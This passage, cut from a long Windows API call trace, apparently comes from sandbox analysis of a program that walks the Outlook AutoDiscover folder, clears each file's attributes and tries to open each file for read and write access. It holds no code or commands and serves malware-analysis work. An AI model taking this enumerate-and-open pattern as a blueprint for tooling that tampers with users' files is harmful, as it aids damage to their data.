Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML", dwFileAttributes=0x80) returned 0 [0137.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\snet.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.519] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.519] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.519] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.519] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML", dwFileAttributes=0x80) returned 0 [0137.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\SWBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\swbell.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.519] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.520] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.520] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML", dwFileAttributes=0x80) returned 0 [0137.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\TALK21.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\talk21.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.520] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.520] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.520] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML", dwFileAttributes=0x80) returned 0 [0137.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\WANS.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\wans.net.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.521] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.521] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.521] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.521] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML", dwFileAttributes=0x80) returned 0 [0137.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CA.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.523] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.523] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.523] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML", dwFileAttributes=0x80) returned 0 [0137.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.ID.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.id.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.524] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.524] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.525] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML", dwFileAttributes=0x80) returned 0 [0137.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.IN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.in.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.525] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.525] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.526] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML", dwFileAttributes=0x80) returned 0 [0137.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.JP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.526] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML", dwFileAttributes=0x80) returned 0 [0137.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.KR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.528] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML", dwFileAttributes=0x80) returned 0 [0137.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.nz.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.528] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.528] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML", dwFileAttributes=0x80) returned 0 [0137.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.th.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.530] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML", dwFileAttributes=0x80) returned 0 [0137.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.uk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.531] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML", dwFileAttributes=0x80) returned 0 [0137.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.531] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML", dwFileAttributes=0x80) returned 0 [0137.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.au.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.532] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.532] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML", dwFileAttributes=0x80) returned 0 [0137.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.br.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.533] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML", dwFileAttributes=0x80) returned 0 [0137.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.cn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.533] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.533] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML", dwFileAttributes=0x80) returned 0 [0137.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.hk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.534] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.534] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.535] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.535] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML", dwFileAttributes=0x80) returned 0 [0137.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.mx.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.535] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.535] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.535] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.535] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML", dwFileAttributes=0x80) returned 0 [0137.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.my.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.536] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.536] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.536] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML", dwFileAttributes=0x80) returned 0 [0137.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ph.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.536] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.536] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.536] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML", dwFileAttributes=0x80) returned 0 [0137.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.sg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.537] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML", dwFileAttributes=0x80) returned 0 [0137.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.tw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.538] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.538] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML", dwFileAttributes=0x80) returned 0 [0137.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.vn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.538] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.538] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.538] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML", dwFileAttributes=0x80) returned 0 [0137.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.539] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML", dwFileAttributes=0x80) returned 0 [0137.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.DE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.de.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.540] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML", dwFileAttributes=0x80) returned 0 [0137.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.ES.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.es.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.540] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML", dwFileAttributes=0x80) returned 0 [0137.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.FR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.fr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.541] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.541] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML", dwFileAttributes=0x80) returned 0 [0137.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.hk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.542] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML", dwFileAttributes=0x80) returned 0 [0137.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.542] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.542] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.542] FindNextFileW (in: 